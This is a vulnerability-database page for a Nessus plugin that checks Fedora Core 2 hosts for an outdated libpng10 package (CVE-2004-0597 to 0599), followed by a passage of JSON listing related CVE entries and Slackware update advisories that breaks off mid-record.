Search...

Fedora Core 2 : libpng10-1.0.15-8 (2004-238)

2004-08-05T00:00:00

ID FEDORA_2004-238.NASL
Type nessus
Reporter This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.
Modified 2004-08-05T00:00:00

Description

The libpng package contains a library of functions for creating and manipulating PNG (Portable Network Graphics) image format files.

During a source code audit, Chris Evans discovered several buffer overflows in libpng. An attacker could create a carefully crafted PNG file in such a way that it would cause an application linked with libpng to execute arbitrary code when the file was opened by a victim. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0597 to these issues.

In addition, this audit discovered a potential NULL pointer dereference in libpng (CVE-2004-0598) and several integer overflow issues (CVE-2004-0599). An attacker could create a carefully crafted PNG file in such a way that it would cause an application linked with libpng to crash when the file was opened by the victim.

Red Hat would like to thank Chris Evans for discovering these issues.

Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.

                                        
                                            #%NASL_MIN_LEVEL 70300

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Fedora Security Advisory 2004-238.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(14209);
  script_version("1.21");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/11");

  script_cve_id("CVE-2004-0597");
  script_xref(name:"FEDORA", value:"2004-238");

  script_name(english:"Fedora Core 2 : libpng10-1.0.15-8 (2004-238)");
  script_summary(english:"Checks rpm output for the updated packages.");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Fedora Core host is missing a security update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"The libpng package contains a library of functions for creating and
manipulating PNG (Portable Network Graphics) image format files.

During a source code audit, Chris Evans discovered several buffer
overflows in libpng. An attacker could create a carefully crafted PNG
file in such a way that it would cause an application linked with
libpng to execute arbitrary code when the file was opened by a victim.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2004-0597 to these issues. 

In addition, this audit discovered a potential NULL pointer
dereference in libpng (CVE-2004-0598) and several integer overflow
issues (CVE-2004-0599). An attacker could create a carefully crafted
PNG file in such a way that it would cause an application linked with
libpng to crash when the file was opened by the victim.

Red Hat would like to thank Chris Evans for discovering these issues.

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  # https://lists.fedoraproject.org/pipermail/announce/2004-August/000246.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?d01ab5cf"
  );
  script_set_attribute(
    attribute:"solution", 
    value:
"Update the affected libpng10, libpng10-debuginfo and / or
libpng10-devel packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:libpng10");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:libpng10-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:libpng10-devel");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora_core:2");

  script_set_attribute(attribute:"patch_publication_date", value:"2004/08/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/08/05");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" &gt;!&lt; release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^2([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 2.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" &gt;!&lt; cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

flag = 0;
if (rpm_check(release:"FC2", reference:"libpng10-1.0.15-8")) flag++;
if (rpm_check(release:"FC2", reference:"libpng10-debuginfo-1.0.15-8")) flag++;
if (rpm_check(release:"FC2", reference:"libpng10-devel-1.0.15-8")) flag++;


if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "libpng10 / libpng10-debuginfo / libpng10-devel");
}

JSON Vulners Source

Initial Source

{"id": "FEDORA_2004-238.NASL", "bulletinFamily": "scanner", "title": "Fedora Core 2 : libpng10-1.0.15-8 (2004-238)", "description": "The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2004-08-05T00:00:00", "modified": "2004-08-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/14209", "reporter": "This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.", "references": ["http://www.nessus.org/u?d01ab5cf"], "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "type": "nessus", "lastseen": "2021-01-12T10:05:42", "edition": 24, "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0599", "CVE-2004-0598", "CVE-2004-0597"]}, {"type": "slackware", "idList": ["SSA-2004-222-01", "SSA-2004-223-01", "SSA-2004-223-02"]}, {"type": "osvdb", "idList": ["OSVDB:8314", "OSVDB:8326", "OSVDB:8313", "OSVDB:8316", "OSVDB:8315", "OSVDB:8312"]}, {"type": "openvas", "idList": ["OPENVAS:53918", "OPENVAS:52422", "OPENVAS:136141256231053920", "OPENVAS:53226", "OPENVAS:54633", "OPENVAS:54652", "OPENVAS:52430", "OPENVAS:53920", "OPENVAS:53262", "OPENVAS:136141256231053918"]}, {"type": "f5", "idList": ["SOL4009", "F5:K4009"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:15126", "SECURITYVULNS:DOC:15127", "SECURITYVULNS:DOC:6578", "SECURITYVULNS:DOC:8854", "SECURITYVULNS:DOC:6579", "SECURITYVULNS:DOC:7769", "SECURITYVULNS:DOC:7775", "SECURITYVULNS:DOC:6651"]}, {"type": "gentoo", "idList": ["GLSA-200408-22", "GLSA-200408-03"]}, {"type": "nessus", "idList": ["FEDORA_2004-236.NASL", "SLACKWARE_SSA_2004-222-01.NASL", "SUSE_SA_2004_023.NASL", "FREEBSD_PKG_F9E3E60BE65011D89B0A000347A4FA7D.NASL", "FREEBSD_LIBPNG_1257.NASL", "FEDORA_2004-237.NASL", "FEDORA_2004-239.NASL", "GENTOO_GLSA-200408-03.NASL", "SLACKWARE_SSA_2004-223-02.NASL", "MANDRAKE_MDKSA-2004-079.NASL"]}, {"type": "freebsd", "idList": ["F9E3E60B-E650-11D8-9B0A-000347A4FA7D"]}, {"type": "redhat", "idList": ["RHSA-2004:421", "RHSA-2004:402"]}, {"type": "cert", "idList": ["VU:236656", "VU:477512", "VU:388984", "VU:817368", "VU:189754", "VU:286464", "VU:160448"]}, {"type": "suse", "idList": ["SUSE-SA:2004:031", "SUSE-SA:2004:023", "SUSE-SA:2004:032", "SUSE-SA:2004:035", "SUSE-SA:2004:030", "SUSE-SA:2004:033", "SUSE-SA:2004:034"]}, {"type": "debian", "idList": ["DEBIAN:DSA-536-1:B4858"]}, {"type": "exploitdb", "idList": ["EDB-ID:393", "EDB-ID:389", "EDB-ID:25094"]}], "modified": "2021-01-12T10:05:42", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-01-12T10:05:42", "rev": 2}, "vulnersScore": 8.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-238.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14209);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0597\");\n script_xref(name:\"FEDORA\", value:\"2004-238\");\n\n script_name(english:\"Fedora Core 2 : libpng10-1.0.15-8 (2004-238)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000246.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d01ab5cf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libpng10, libpng10-debuginfo and / or\nlibpng10-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 2.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC2\", reference:\"libpng10-1.0.15-8\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"libpng10-debuginfo-1.0.15-8\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"libpng10-devel-1.0.15-8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng10 / libpng10-debuginfo / libpng10-devel\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "14209", "cpe": ["cpe:/o:fedoraproject:fedora_core:2", "p-cpe:/a:fedoraproject:fedora:libpng10-devel", "p-cpe:/a:fedoraproject:fedora:libpng10-debuginfo", "p-cpe:/a:fedoraproject:fedora:libpng10"], "scheme": null}

{"cve": [{"lastseen": "2020-12-09T19:21:32", "description": "Multiple buffer overflows in libpng 1.2.5 and earlier, as used in multiple products, allow remote attackers to execute arbitrary code via malformed PNG images in which (1) the png_handle_tRNS function does not properly validate the length of transparency chunk (tRNS) data, or the (2) png_handle_sBIT or (3) png_handle_hIST functions do not perform sufficient bounds checking.", "edition": 5, "cvss3": {}, "published": "2004-11-23T05:00:00", "title": "CVE-2004-0597", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0597"], "modified": "2018-10-12T21:34:00", "cpe": ["cpe:/o:microsoft:windows_me:*", "cpe:/a:microsoft:windows_media_player:9", "cpe:/o:microsoft:windows_98se:*", "cpe:/a:microsoft:msn_messenger:6.2", "cpe:/a:greg_roelofs:libpng:1.2.5", "cpe:/a:microsoft:windows_messenger:5.0", "cpe:/a:microsoft:msn_messenger:6.1"], "id": "CVE-2004-0597", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0597", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_me:*:*:second_edition:*:*:*:*:*", "cpe:2.3:a:microsoft:msn_messenger:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:greg_roelofs:libpng:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:windows_media_player:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:msn_messenger:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_98se:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:windows_messenger:5.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:21:32", "description": "The png_handle_iCCP function in libpng 1.2.5 and earlier allows remote attackers to cause a denial of service (application crash) via a certain PNG image that triggers a null dereference.", "edition": 5, "cvss3": {}, "published": "2004-11-23T05:00:00", "title": "CVE-2004-0598", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0598"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:greg_roelofs:libpng:1.2.5"], "id": "CVE-2004-0598", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0598", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:greg_roelofs:libpng:1.2.5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:21:32", "description": "Multiple integer overflows in the (1) png_read_png in pngread.c or (2) png_handle_sPLT functions in pngrutil.c or (3) progressive display image reading capability in libpng 1.2.5 and earlier allow remote attackers to cause a denial of service (application crash) via a malformed PNG image.", "edition": 5, "cvss3": {}, "published": "2004-11-23T05:00:00", "title": "CVE-2004-0599", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0599"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:greg_roelofs:libpng:1.2.5"], "id": "CVE-2004-0599", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0599", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:greg_roelofs:libpng:1.2.5:*:*:*:*:*:*:*"]}], "slackware": [{"lastseen": "2020-10-25T16:36:02", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599"], "description": "New imagemagick packages are available for Slackware 9.1, 10.0,\nand -current to fix security issues with PNG images.\n\nMore details about the issues with PNG may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\nSat Aug 7 17:17:20 AKDT 2004\npatches/packages/imagemagick-6.0.4_3-i486-1.tgz: Upgraded to\n ImageMagick-6.0.4-3. Fixes PNG security issues.\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/imagemagick-5.5.7_25-i486-1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/imagemagick-6.0.4_3-i486-1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/imagemagick-6.0.4_3-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 9.1 package:\n52903d349dcbaf3be88d19c8aa05dbbf imagemagick-5.5.7_25-i486-1.tgz\n\nSlackware 10.0 package:\nad5531a33331029dcc7013b72f8ec792 imagemagick-6.0.4_3-i486-1.tgz\n\nSlackware -current package:\nad5531a33331029dcc7013b72f8ec792 imagemagick-6.0.4_3-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg imagemagick-6.0.4_3-i486-1.tgz", "modified": "2004-08-10T21:26:39", "published": "2004-08-10T21:26:39", "id": "SSA-2004-223-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.353817", "type": "slackware", "title": "[slackware-security] imagemagick", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T07:36:39", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix security issues. These issues could cause program crashes,\nor possibly allow arbitrary code embedded in a malicious PNG image to execute.\nThe PNG library is widely used within the system, so all sites should upgrade\nto the new libpng package.\n\nMore details about these issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\nSat Aug 7 17:17:20 PDT 2004\npatches/packages/libpng-1.2.5-i486-3.tgz: Patched possible security\n issues including buffer and integer overflows and null pointer\n references. These issues could cause program crashes, or possibly\n allow arbitrary code embedded in a malicious PNG image to execute.\n The PNG library is widely used within the system, so all sites\n should upgrade to the new libpng package.\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/libpng-1.2.5-i386-1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/libpng-1.2.5-i386-2.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/libpng-1.2.5-i486-3.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/libpng-1.2.5-i486-3.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpng-1.2.5-i486-3.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\nbe08f3ea7e8b41a3fd7ce49a676617e0 libpng-1.2.5-i386-1.tgz\n\nSlackware 9.0 package:\n6c68e6a65850e26b60651d65fd8c0a2f libpng-1.2.5-i386-2.tgz\n\nSlackware 9.1 package:\n4fcf53708102839f3cac78a99d05e750 libpng-1.2.5-i486-3.tgz\n\nSlackware 10.0 package:\n094a9825c51204a9aa2cb0bbb43b7a64 libpng-1.2.5-i486-3.tgz\n\nSlackware -current package:\n094a9825c51204a9aa2cb0bbb43b7a64 libpng-1.2.5-i486-3.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg libpng-1.2.5-i486-3.tgz", "modified": "2004-08-09T20:40:50", "published": "2004-08-09T20:40:50", "id": "SSA-2004-222-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.439243", "type": "slackware", "title": "libpng", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-25T16:36:03", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599", "CVE-2004-0718", "CVE-2004-0722", "CVE-2004-0757", "CVE-2004-0758", "CVE-2004-0759", "CVE-2004-0760", "CVE-2004-0761", "CVE-2004-0762", "CVE-2004-0763", "CVE-2004-0764", "CVE-2004-0765"], "description": "New Mozilla packages are available for Slackware 9.1, 10.0, and -current\nto fix a number of security issues. Slackware 10.0 and -current were\nupgraded to Mozilla 1.7.2, and Slackware 9.1 was upgraded to Mozilla 1.4.3.\nAs usual, new versions of Mozilla require new versions of things that link\nwith the Mozilla libraries, so for Slackware 10.0 and -current new versions\nof epiphany, galeon, gaim, and mozilla-plugins have also been provided.\nThere don't appear to be epiphany and galeon versions that are compatible\nwith Mozilla 1.4.3 and the GNOME in Slackware 9.1, so these are not\nprovided and Epiphany and Galeon will be broken on Slackware 9.1 if the\nnew Mozilla package is installed. Furthermore, earlier versions of\nMozilla (such as the 1.3 series) were not fixed upstream, so versions\nof Slackware earlier than 9.1 will remain vulnerable to these browser\nissues. If you still use Slackware 9.0 or earlier, you may want to\nconsider removing Mozilla or upgrading to a newer version.\n\nMore details about these issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n Issues fixed in Mozilla 1.7.2:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0763\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0758\n\n Issues fixed in Mozilla 1.4.3:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0718\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0722\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0757\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0758\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0759\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0760\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0761\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0762\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0763\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0764\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0765\n\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\nMon Aug 9 01:56:43 PDT 2004\npatches/packages/epiphany-1.2.7-i486-1.tgz: Upgraded to epiphany-1.2.7.\n (compiled against Mozilla 1.7.2)\npatches/packages/gaim-0.81-i486-1.tgz: Upgraded to gaim-0.81.\n (compiled against Mozilla 1.7.2)\npatches/packages/galeon-1.3.17-i486-1.tgz: Upgraded to galeon-1.3.17.\n (compiled against Mozilla 1.7.2)\npatches/packages/mozilla-1.7.2-i486-1.tgz: Upgraded to Mozilla 1.7.2. This\n fixes three security vulnerabilities. For details, see:\n http://www.mozilla.org/projects/security/known-vulnerabilities.html#mozilla1.7.2\n (* Security fix *)\npatches/packages/mozilla-plugins-1.7.2-noarch-1.tgz: Changed plugin symlinks\n for Mozilla 1.7.2.\n\nWhere to find the new packages:\n\nUpdated packages for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/mozilla-1.4.3-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/mozilla-plugins-1.4.3-noarch-1.tgz\n\nUpdated packages for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/mozilla-1.7.2-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/mozilla-plugins-1.7.2-noarch-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/epiphany-1.2.7-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/gaim-0.81-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/galeon-1.3.17-i486-1.tgz\n\nUpdated packages for Slackware 